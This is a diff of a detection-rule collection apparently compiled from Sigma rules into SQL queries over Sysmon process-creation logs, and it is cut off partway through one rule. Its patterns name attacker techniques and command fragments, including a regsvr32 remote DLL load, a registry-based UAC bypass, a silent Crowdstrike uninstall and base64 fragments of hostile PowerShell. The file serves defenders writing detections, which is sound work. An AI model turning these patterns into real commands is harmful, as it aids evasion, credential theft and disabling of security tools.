"proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Use Icacls to Hide File to Everyone", - "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", + "title": "Potential Command Line Path Traversal Evasion Attempt", + "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", "status": "experimental", - "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", - "author": "frack113", + "description": "Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1036" ], "falsepositives": [ - "Legitimate use" + "Google Drive", + "Citrix" ], "level": "medium", "rule": [ - 
"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'iCACLS.EXE' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_icacls_deny.yml" + "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" }, { - "title": "Suspicious SYSVOL Domain Group Policy Access", - "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects Access to Domain Group Policies stored in SYSVOL", - "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027", + "attack.t1620" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine 
LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\policies\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_sysvol_access.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "Suspicious Rundll32 Setupapi.dll Activity", + "id": "285b85b1-a555-4095-8652-a8a4106af63f", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified 
.chm files.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "title": "Use of PktMon.exe", + "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "description": "Tools to Capture 
Network Packets on the windows 10 with October 2018 Update or later.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_lolbin_pktmon.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", - "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", - "author": "Florian Roth (Nextron Systems)", + "title": "XSL Script Processing", + "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", + "status": "test", + "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. 
Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", + "author": "Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1220" ], "falsepositives": [ - "FQDNs that start with a number" + "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", + "Msxsl.exe is not installed by default, so unlikely.", + "Static format arguments - https://petri.com/command-line-wmi-part-3" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (CommandLine LIKE '%/format%' ESCAPE '\\' OR CommandLine LIKE '%-format%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Format:List%' ESCAPE 
'\\' OR CommandLine LIKE '%Format:htable%' ESCAPE '\\' OR CommandLine LIKE '%Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%Format:table%' ESCAPE '\\' OR CommandLine LIKE '%Format:mof%' ESCAPE '\\' OR CommandLine LIKE '%Format:value%' ESCAPE '\\' OR CommandLine LIKE '%Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%Format:csv%' ESCAPE '\\'))) OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_wmic_xsl_script_processing.yml" }, { - "title": "Potential SPN Enumeration Via Setspn.EXE", - "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", - "status": "test", - "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", - "author": "Markus Neis, keepwatch", + "title": "Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell", + "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", + "status": "stable", + "description": "Detects Powershell as a child of the WmiPrvSE process. 
Which could be a sign of lateral movement via WMI.", + "author": "Markus Neis @Karneades", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.execution", + "attack.t1047", + "attack.t1059.001" ], "falsepositives": [ - "Administration activity" + "AppvClient", + "CCM", + "WinRM" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "proc_creation_win_setspn_spn_enumeration.yml" + "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" }, { - "title": "Ruby Inline Command Execution", - "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", - "status": "experimental", - "description": "Detects execution of ruby using the \"-e\" flag. 
This is could be used as a way to launch a reverse shell or execute live ruby code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Reg Add Open Command", + "id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "status": "test", + "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ruby_inline_command_execution.yml" + "filename": "proc_creation_win_reg_open_command.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", - "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. 
Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", + "id": "eee00933-a761-4cd0-be70-c42fe91731e7", + "status": "test", + "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.execution", - "attack.t1047" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentImage LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + 
"attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "File Download Using ProtocolHandler.exe", - "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", + "title": "Windows Admin Share Mount Via Net.EXE", + "id": "3abd6094-7027-475f-9630-8ab9be7b9725", + "status": "test", + "description": "Detects when an admin share is mounted using net.exe", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "falsepositives": [ + "Administrators" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_net_use_mount_admin_share.yml" + }, + { + "title": "Suspicious New Instance Of An Office COM Object", + "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", "status": "experimental", - "description": "Detects usage of 
\"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", - "author": "frack113", + "description": "Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of office automation via scripting" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" + "filename": "proc_creation_win_office_svchost_parent.yml" }, { - "title": "Arbitrary Command Execution Using WSL", - "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": 
"1ca6bd18-0ba0-44ca-851c-92ed89a61085", "status": "test", - "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", - "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Automation and orchestration scripts may use this method to execute scripts etc.", - "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -e kill %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_lolbin_susp_wsl.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Suspicious Execution of Powershell with Base64", - "id": "fb843269-508c-4b76-8b8d-88679db22ce7", - "status": "experimental", - 
"description": "Commandline to launch powershell with a base64 payload", - "author": "frack113", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "status": "test", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ "attack.execution", "attack.t1059.001" 
@@ -22905,1714 +22911,1748 @@ "falsepositives": [ "Unknown" ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE 
'%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' 